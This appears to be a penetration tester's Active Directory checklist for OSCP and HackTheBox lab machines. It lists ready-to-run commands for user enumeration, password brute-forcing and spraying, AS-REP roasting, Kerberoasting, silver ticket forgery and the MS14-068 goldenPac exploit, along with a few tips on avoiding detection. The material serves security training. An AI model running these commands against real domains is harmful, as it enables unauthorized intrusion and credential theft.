# Active Directory Checklist ## Unauthenticated * [ ] Unauthenticated * [ ] Get Hostnames * [ ] `nxc smb 192.168.209.1` * [ ] Use nslookup with server set to DC/NS server and ask for localhost or ip * [ ] `nslookup ; server ; ` * [ ] run dnsrecon on the subnet `dnsrecon -d -r ` * [ ] Setup /etc/hosts * [ ] `nxc smb [IP]` * [ ] Alternatively add the name server to /etc/resolv.conf * [ ] Sync time for kerberos if lapse * [ ] `sudo ntpdate [IP]` * [ ] \`sudo rdate -n \[IP] * [ ] Nmap TCP scan * [ ] Host identification * [ ] `sudo nmap -T4 -p 21,22,23,25,53,69,80,81,88,110,111,119,123,137-139,161,389,443,445,465,500,512-513,548,587,623-624,993-995,1099,11211,1241,1433-1434,1521,1723,2049,2483-2484,27017-27019,3268-3269,3306,3389,4333,4786,4848,5060-5061,5432,5800,5900-5901,5985-5986,6000-6001,7001,8000,8080,8181,8443,10000,16992-16993,32764 -v 172.16.1.0/24 -oA scans/nmap-pulse-172.16.1.0` * [ ] `cat scans/nmap-pulse-172.16.1.0.gnmap|grep ': Up'|cut -d ' ' -f2 > active_hosts` * [ ] \[ ] * [ ] `sudo nmap -sV -sC -oA scans/nmap-tcp-initial -v` * [ ] `sudo nmap -sV -sC -oA scans/nmap-tcp-full -p- -v` Tip: If DC make sure time is correct for kerberos port * [ ] Use nslookup with server set to DC/NS server and ask for localhost or ip. If ipv6 addr found; * [ ] `nmap -6 [ipv6]` * [ ] Nmap UDP scan * [ ] `sudo nmap -sU -p 53,69,111,161,500,623,2049 --open -oA scans/nmap-udp -iL targets.txt` * [ ] Get Domain Info * [ ] `ldapsearch -x -H ldap:// -s base namingcontexts` * [ ] `ldapsearch -x -H ldap://10.129.53.189 -b 'dc=egotistical-bank,dc=local' -s sub '*'` * [ ] `nxc smb resolute -u '' -p '' --pass-pol` * [ ] Dump AD Users (DC) * [ ] `nxc smb 192.168.209.1 -u '' -p '' --users` * [ ] `nxc ldap resolute -u '' -p '' -M user-desc` * [ ] `rpcclient -U '' 10.129.96.155` * [ ] `enumdomusers` * [ ] `querydispinfo` * [ ] `ldapsearch -LLL -x -H ldap://192.168.129.100 -b 'oscp.exam' -s sub '(objectclass=person)' '*'|grep -i samaccountname|cut -d ':' -f 2|sed 's/ //g'>>users` Tip: Did you get all users? Remember svc-alfresco? * [ ] `impacket-GetADUsers -dc-ip 10.129.227.113 -dc-host dc01 "timelapse.htb/" -all -debug` Tip: if you are able to dump users, read through the output to look for plain text passwords in the description column. Also try Asreproasting And brute-forcing * [ ] Enumerate anonymous/null file shares * [ ] `nxc smb 192.168.209.1 -u '' -p '' --shares` * [ ] `nxc smb 192.168.209.1 -u 'a' -p '' --shares | tee scans/nxc-anon-shares.log` * [ ] `smbclient -L //192.168.209.1` * [ ] `smbmap -d megabank.local -u '' -H resolute -r --depth 20|tee scans/smbmap-anon-recursive.log` * [ ] `smbmap -d megabank.local -u 'a' -H resolute -r --depth 20|tee scans/smbmap-anon-recursive.log` * [ ] `smbmap -d cascade.local -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'` * [ ] Check files closely with exiftool and strings * [ ] Mount shares and test writability * [ ] Users accounts * [ ] Enumerate Users * [ ] `~/Documents/loadables/tools/kerbrute userenum -d htb.local --dc rabbit /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t 500` * [ ] `nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='oscp.exam',userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt -Pn 192.168.129.100` * [ ] Enumerate from files found with exif tool * [ ] Brute-force Accounts * [ ] `nxc ldap monteverde -u users -p users --no-bruteforce` Tip: try this first * [ ] Create a word list from a user dump * [ ] `hashcat users -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/leetspeak.rule --stdout > pguesses` Tip: you could add months and seasons to this. NSA rules are really good. * [ ] `nxc ldap monteverde -u users -p users` * [ ] `kerbrute bruteuser -d oscp.exam --dc dc01 /usr/share/wordlists/fasttrack.txt --verbose lisa` Tip: Doesn't create event code 4624 to indicate a failed password * [ ] `cat users | xargs -t -I USR ~/loadables/tools/kerbrute bruteuser --dc resolute -d megabank.local -t 200 /usr/share/wordlists/seclists/Passwords/Default-Credentials/default-passwords.txt --verbose USR` Check all accounts against the users we found user = user pass = user * [ ] ASRepRoast * [ ] `(&(&(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))))` * [ ] `nxc ldap [DC IP] -u users -p '' --asreproast hashes/asreproast.hash` * [ ] `impacket-GetNPUsers -dc-ip sauna -request -usersfile users -outputfile hashes/asreproast.hash 'egotisticalbank/'` ## Authenticated Tip: If authenticated, vpn could be switched to VM Win host to make life easier for certain attacks. * [ ] Authenticated * [ ] Shares/Policy * [ ] `nxc smb hathor -u users -p passwords -k -d windcorp.htb -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=finds` * [ ] `smbmap -d -u melanie -p 'Welcome123!' -H resolute -r --depth 20` * [ ] `smbmap -d cascade.local -u 'r.thompson' -p rY4n5eva -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'` * [ ] Check files closely with exiftool and strings * [ ] Use dnspy to decompile fishy exec files * [ ] sniff traffic of exec files * [ ] Kerberoast * [ ] `(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))` * [ ] `nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting hashes/kerbroast` * [ ] `impacket-GetUserSPNs -request -dc-ip 10.129.249.79 -target-domain active.htb active.htb/svc_tgs` * [ ] Bloodhound / ldapsearch / AD Users * [ ] `bloodhound-python -u 'ldap' -c all -d support.htb -ns 10.129.239.21 -p 'pass' --dns-tcp` * [ ] Set Objects as owned as you go * [ ] Look for GenericAll Privileges given direct or thorough groups. Use the Outbound object control to view these privileges. * [ ] `Sharphound.exe -c all -d active.htb --domaincontroller 10.10.10.100` Tip: Run this from a runas netonly after grabbing a ticket with dir whackwhack dcip * [ ] `nxc ldap -u user -p pass --bloodhound -ns --collection All` Tip: Make sure \~/.nxc/nxc.conf is configured. THIS DOESNT WORK FOR ME * [ ] `ldapdomaindump -u 'support.htb\ldap' -p $(cat ../passwords) --no-json --no-grep -r dc` * [ ] `ldapsearch -H ldap://support.htb -b 'dc=support,dc=htb' -D 'ldap@support.htb' -w 'pass' -s sub '(objectclass=user)' 'info' 'description'` Tip: Use 'star' and look at ALL fields for users. Info and Description especially * [ ] `ldapsearch -H ldap://dc1 -b 'dc=scrm,dc=local' -U 'ksimpson' -W -s sub '(objectclass=user)' 'memberof'` * [ ] Analyze full domain dump for anomalies * [ ] `cat domain.ldif|awk '{print $1}'|sort | uniq -c | sort -nr` * [ ] Dump AD Users (DC) * [ ] `nxc ldap dc -u ldap -p passwords --users` * [ ] Silver Ticket * [ ] Need NTLM hash of password * [ ] `python3 -c "import hashlib;r=hashlib.new('md4','REGGIE1234ronnie'.encode('utf-16le')).digest().hex();print(r)"` * [ ] Need domain SID * [ ] `nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid` * [ ] `Get-ADDomain` * [ ] `impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson` * [ ] \[ ] * [ ] `impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local administrator` Tip: invalid spn throws ioc to blues. Try hard * [ ] `export KRB5CCNAME=` * [ ] `impacket-psexec /@ -k -no-pass` * [ ] `impacket-smbexec /@ -k -no-pass` * [ ] `impacket-wmiexec /@ -k -no-pass` * [ ] `impacket-mssqlclient /@ -k -no-pass` * [ ] Password Spray Tip: New passwords found are worth a spray * [ ] `~/Documents/loadables/tools/kerbrute passwordspray -d search.htb --dc research -t 500 users '@3ONEmillionbaby'` * [ ] `nxc ldap research -u users -p '@3ONEmillionbaby' --continue-on-success` * [ ] Golden Ticket Forgery CVE-2014-6324 * [ ] `impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis` * [ ] Can you change passwords? * [ ] `rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'` * [ ] Is this a Certificate Authority with vulnerable cert? * [ ] `certipy-ad find -vulnerable -dc-ip 10.129.228.253 -enabled -u ryan.cooper@sequel.htb -p NuclearMosquito3` Tip: